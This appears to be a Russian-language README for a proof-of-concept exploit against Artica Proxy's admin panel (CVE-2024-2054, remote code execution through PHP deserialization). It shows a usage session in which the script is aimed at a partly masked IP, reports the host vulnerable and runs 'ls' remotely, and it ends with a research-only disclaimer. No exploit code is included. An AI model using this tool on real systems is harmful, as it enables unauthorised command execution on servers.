
Эксплойт доказательства концепции для CVE-2024-2054, демонстрирующий удаленное выполнение кода через небезопасную десериализацию в веб-приложении административной панели Artica-Proxy. Включает выполнение команд и проверку уязвимости.
Эксплойт доказательства концепции для веб-приложения администрирования ARTICA PROXY CVE-2024-2054
Подробнее здесь: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Этот POC создан исключительно для целей академических исследований и разработки эффективных защитных методов, и не предназначен для атаки на системы, за исключением случаев явного разрешения. Создатели/поддерживающие проект не несут ответственности за неправильное использование программного обеспечения/POC. Используйте ответственно.